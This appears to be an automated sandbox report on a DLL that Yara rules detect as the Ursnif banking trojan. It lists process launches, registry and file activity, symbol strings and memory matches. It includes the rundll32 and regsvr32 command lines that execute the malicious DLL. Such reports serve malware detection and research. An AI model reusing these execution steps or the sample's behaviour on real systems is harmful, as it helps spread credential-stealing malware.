                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,EupyrchroiteJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,SplitbeakJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,AndirinJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,DrailJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:17410 /prefetch:2Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:82962 /prefetch:2Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:17428 /prefetch:2Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:82974 /prefetch:2Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{86DBC09F-1262-11EC-90E6-ECF4BB82F7E0}.datJump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user~1\AppData\Local\Temp\~DF8A471FFBEDEC3971.TMPJump to behavior
                      Source: classification engineClassification label: mal92.troj.winDLL@62/162@17/8
                      Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F9757F CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_02F9757F
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2736
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6840
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb& source: WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000023.00000003.376618336.00000000056D2000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411054361.0000000005342000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000029.00000003.411166142.0000000005353000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000023.00000003.376792297.00000000056D0000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411820381.0000000005340000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000023.00000003.376618336.00000000056D2000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411054361.0000000005342000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411166142.0000000005353000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb) source: WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdbm/pZ source: WerFault.exe, 00000029.00000003.411820381.0000000005340000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000023.00000003.376618336.00000000056D2000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411054361.0000000005342000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb3 source: WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000023.00000003.376618336.00000000056D2000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411054361.0000000005342000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000023.00000003.376618336.00000000056D2000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411054361.0000000005342000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdbn.xP source: WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000023.00000003.376951522.00000000056E4000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000023.00000003.376792297.00000000056D0000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411820381.0000000005340000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000023.00000003.363884828.00000000053A3000.00000004.00000001.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000023.00000003.376618336.00000000056D2000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411054361.0000000005342000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000023.00000003.376618336.00000000056D2000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411054361.0000000005342000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbN~g source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000023.00000003.376618336.00000000056D2000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411054361.0000000005342000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000023.00000003.376618336.00000000056D2000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411054361.0000000005342000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbU^ source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: Binary string: wUxTheme.pdb= source: WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000023.00000003.376792297.00000000056D0000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411820381.0000000005340000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000023.00000003.376618336.00000000056D2000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411054361.0000000005342000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000023.00000003.376792297.00000000056D0000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411820381.0000000005340000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000023.00000003.376792297.00000000056D0000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411820381.0000000005340000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 00000023.00000003.376951522.00000000056E4000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: Binary string: CoreUIComponents.pdbn'xY source: WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00402143 push ecx; ret 0_2_00402153
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_004020F0 push ecx; ret 0_2_004020F9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F9EAE5 push ds; retf 0_2_02F9EAEB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F9E4C9 push ecx; ret 0_2_02F9E4CA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F9AD50 push ecx; ret 0_2_02F9AD59
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F9B10B push ecx; ret 0_2_02F9B11B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01360005 push dword ptr [ebp-0000027Ch]; ret 0_2_01360065
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01360066 push dword ptr [ebp-0000027Ch]; ret 0_2_0136009B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01360397 push dword ptr [esp+0Ch]; ret 0_2_013603AA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01360397 push dword ptr [esp+10h]; ret 0_2_013603EF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0136009C push dword ptr [ebp-0000027Ch]; ret 0_2_01360231
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0136009C push dword ptr [ebp-00000284h]; ret 0_2_01360284
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0136009C push dword ptr [esp+10h]; ret 0_2_01360396
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_026D20F0 push ecx; ret 2_2_026D20F9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_026D2143 push ecx; ret 2_2_026D2153
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_023EEAE5 push ds; retf 2_2_023EEAEB
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_023EE4C9 push ecx; ret 2_2_023EE4CA
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_023EB10B push ecx; ret 2_2_023EB11B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_023EAD50 push ecx; ret 2_2_023EAD59
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_031BB10B push ecx; ret 3_2_031BB11B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_031BAD50 push ecx; ret 3_2_031BAD59
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_031BE4C9 push ecx; ret 3_2_031BE4CA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_031BEAE5 push ds; retf 3_2_031BEAEB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_029F009C push dword ptr [ebp-0000027Ch]; ret 3_2_029F0231
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_029F009C push dword ptr [ebp-00000284h]; ret 3_2_029F0284
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_029F009C push dword ptr [esp+10h]; ret 3_2_029F0396
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_029F0005 push dword ptr [ebp-0000027Ch]; ret 3_2_029F0065
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_029F0066 push dword ptr [ebp-0000027Ch]; ret 3_2_029F009B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_029F0397 push dword ptr [esp+0Ch]; ret 3_2_029F03AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_029F0397 push dword ptr [esp+10h]; ret 3_2_029F03EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_035E009C push dword ptr [ebp-0000027Ch]; ret 5_2_035E0231
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00401745 LoadLibraryA,GetProcAddress,0_2_00401745
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\qT9Qk5aKTk.dll

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 0000002C.00000003.488597994.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322676857.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474137548.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322202508.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.473987515.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322499280.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488543169.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504757746.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.417091528.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.530490300.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488696812.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416892582.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488440717.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416449935.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.473902712.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.505290500.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474356584.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.417147272.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416620379.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.505377175.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488723167.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504698368.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.417041948.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474088169.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.528892428.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504300183.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322381939.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322406561.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504841805.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322337741.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474318739.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322575665.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504617318.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504419460.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488754897.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474399932.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488667528.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488635694.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416772424.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.530985686.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322291731.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474430335.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416968580.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5004, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5828, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1404, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7100, type: MEMORYSTR
                      Source: Yara matchFile source: 25.2.rundll32.exe.510000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.510000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.510000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.47e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.rundll32.exe.7b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2ba0000.0.raw.unpack, type: UNPACKEDPE
